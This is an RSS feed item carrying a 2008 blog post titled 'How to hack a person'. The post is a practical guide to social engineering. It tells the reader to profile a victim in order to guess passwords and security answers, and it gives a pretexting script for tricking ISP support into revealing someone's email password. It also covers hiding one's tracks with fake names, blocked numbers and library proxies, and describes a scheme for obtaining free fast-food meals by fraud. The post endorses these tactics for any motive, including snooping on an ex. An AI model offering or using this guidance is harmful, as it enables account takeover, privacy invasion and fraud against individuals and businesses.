		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[phising]]></category>
		<category><![CDATA[social engineer]]></category>
		<category><![CDATA[trick]]></category>

		<guid isPermaLink="false">http://www.joetech.com/2008/01/23/how-to-hack-a-person/</guid>
		<description><![CDATA[Most people are familiar with the term &#8220;hacking&#8221;. In general, it refers to gaining unauthorized access to a computer. One definition from m-w.com is &#8220;to gain access to a computer illegally&#8221;. To me, hacking refers to gaining unauthorized access to information. I&#8217;m not going to explain how to hack a computer. Instead, I&#8217;m going [...]


]]></description>
			<content:encoded><![CDATA[<p>Most people are familiar with the term &#8220;<a href="http://www.stephanmiller.com/the-refresh-georgian-hacker/">hacking</a>&#8221;.  In general, it refers to gaining unauthorized access to a computer.  One definition from <a href="http://www.m-w.com">m-w.com</a> is &#8220;to gain access to a computer illegally&#8221;.  To me, hacking refers to gaining unauthorized access to information.  I&#8217;m not going to explain how to hack a computer.  Instead, I&#8217;m going to talk about how to hack a person, or, how to gain information from a person that they would not otherwise provide.  This is also widely known as &#8220;<a href="http://en.wikipedia.org/wiki/Social_engineering_(security)">social engineering</a>&#8221;.</p>
<p><img src='http://www.joetech.com/wp-content/uploads/2008/01/burlgar.jpg' alt="Computer and Internet Security" /></p>
<p><strong>Get to know your mark</strong><br />
A mark is simply the victim of your information theft.  While you may have valid, legal, motives for sneaking around normal channels, I&#8217;ll refer to the target as your &#8220;mark&#8221; because I&#8217;m lazy.</p>
<p>Social engineering often involves pretending to be someone you are not.  Many times, you may need to pretend to be a client, for example, in order to get their password from their domain registrar or internet service provider.  You may have other, more sinister, motives for gathering sensitive data, too.  Either way, you will need to be prepared with answers to key questions, appropriate reactions, etc.  Research all the information you can about whatever you are trying to get access to as well as the person you are claiming to be (where applicable).  For example, if you were to call a large ISP, attempting to get the password to your mark&#8217;s email account, you would want to know his or her full name, email address, and birth date at a minimum.  Other helpful things to know are names of the girl/boyfriend, spouse, child, pet, etc., hobbies, bands or stars the person likes, and anything else very personal.  More often than not, one of these things is the answer to your mark&#8217;s &#8220;hint&#8221; question, that question they ask you before divulging your password when you&#8217;ve forgotten it.  Sometimes, that one word is all you need.</p>
<p><strong>Some alarming facts</strong><br />
Around 2-4% of all people have a password of &#8220;password&#8221; or a pin/security code of &#8220;1234&#8221;.  Many of the rest have passwords that can be found in a dictionary file (a file full of dictionary words used for guessing a password randomly).  If your mark is 16 and her boyfriend is named Mark (but she calls him &#8220;markypoo&#8221; all over her MySpace page), you might be able to skip all the dirty work by just trying &#8220;mark&#8221;, &#8220;markypoo&#8221;, &#8220;ilovemark&#8221;, or &#8220;ilovemarkypoo&#8221; as her password.  Just about every demographic seems to fall under the rule that you can usually guess a password within about 20 tries if you get to know the owner of the account.  Some more clues that can help are birth dates, nicknames, sports teams, and movie/TV characters.  Know your mark (above) and the rest is pretty easy.</p>
<p><strong>Get to know your source</strong><br />
When I say &#8220;source&#8221;, I mean the source of your information.  This could be anything from an automated web form to a phone support representative, to a front desk employee at a hotel.  The type of information you are looking for should dictate what your source is, and it should be fairly obvious to you.  Pretend, for a second, that you&#8217;re looking for that email password from above.  Logic dictates that your source is going to be your mark&#8217;s ISP.  Become a customer, client, or user.  Sign up for an email account of your own and make note of the security questions.  Test the password entry form and see if it has a minimum/maximum amount of characters or has any other requirements.  Does the site suggest a username for you like Yahoo! does (eg: JohnDoe2008)?  Any information you can glean through creative and thoughtful experimentation can be instrumental in your success.</p>
<p><strong>Confidence is key</strong><br />
You&#8217;ve probably heard that before, but in another context.  It&#8217;s a popular phrase when talking about sales or success in business.  Confidence can drive your job interview home, it can get you sales, and it can even get you a date, but it can also be the key ingredient when trying to con a source out of information.  If you act nervous in your efforts, it will likely get noticed and make your source suspicious.  Speak clearly, act casual, and act like you&#8217;re supposed to get the information you&#8217;re asking for.  Many times, you can even act as if you were waiting for a third party (whose name you now forget) to call you back with that information.  Begin a support call by saying &#8220;I somehow got disconnected.  I called in because I forgot my password and I forget who I spoke to, but he asked me the security questions and then the call dropped.&#8221;  If you gently suggest to your source that another person in the company trusted your authority to access a password and was about to give it to you, this will sometimes lower their guard just enough to squeak by.</p>
<p><strong>Confident does not mean sloppy</strong><br />
Sometimes you are acting in the best interest of someone who knows what you&#8217;re doing, but what if you&#8217;re just trying to snoop through someone&#8217;s email or you want to throw a surprise party for someone and just need to grab their contact list from their gmail account?  If you don&#8217;t want anyone to know what you&#8217;re doing, you had better not leave a trail behind you.  Getting caught can be embarrassing and get you into trouble with your mark.  Worse, if you&#8217;re doing what I think you shouldn&#8217;t be, you could get jail time.  That said, here are some things to think about before you begin:</p>
<ul>
<li>- Don&#8217;t use your real name&#8230; anywhere</li>
<li>- If using the phone, block your number</li>
<li>- If using the web, go through a proxy (from a library)</li>
<li>- If using email, get a throwaway email account and check via web mail (from the library)</li>
<li>- Know the legality of what you&#8217;re planning</li>
<li>- Try not to break the law if possible</li>
</ul>
<p>The more careful you are, the less you have to worry about, and the more confident you can be when faced with the human interaction.</p>
<p><strong>Get more than information</strong><br />
People-hacking works for more than just snooping on your ex-girlfriend&#8217;s email (stop obsessing and get over her).  You can also work out discounts and deals by knowing how to deal with a particular source.  Here&#8217;s <a href="http://www.schneier.com/blog/archives/2007/09/how_to_get_free.html">an easy experiment</a> you can do: Call a fast food joint on a weekday afternoon (right during the busy lunch time) and explain that your order was messed up.  Your complaint should be believable, but bad enough that your meal was practically not edible to you.  Say they put ketchup on your burger after you asked for no ketchup.  Know ahead of time what you ordered (a popular combo meal will probably have been ordered in the last hour by someone at the drive-thru, making it more plausible).  Almost every time, they will write down your first name (which can be any name you want to give them).  The next day, show up and explain that you were told you would get a complimentary meal for the one they messed up.  Give them the name you gave over the phone, order the same meal, and enjoy eating for free.  I can&#8217;t publicly condone doing this, so if you happen to try it for the purpose of experimentation, even the score by donating $6 to charity or something.</p>
<p>There are many morally valid and many morally corrupt reasons for needing to obtain information, goods, or services via unconventional means like social engineering.  Whatever your reason, identify what you want, plan it out, and go get it.</p>


]]></content:encoded>
			<wfw:commentRss>http://www.joetech.com/how-to-hack-a-person/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
	</channel>
</rss>

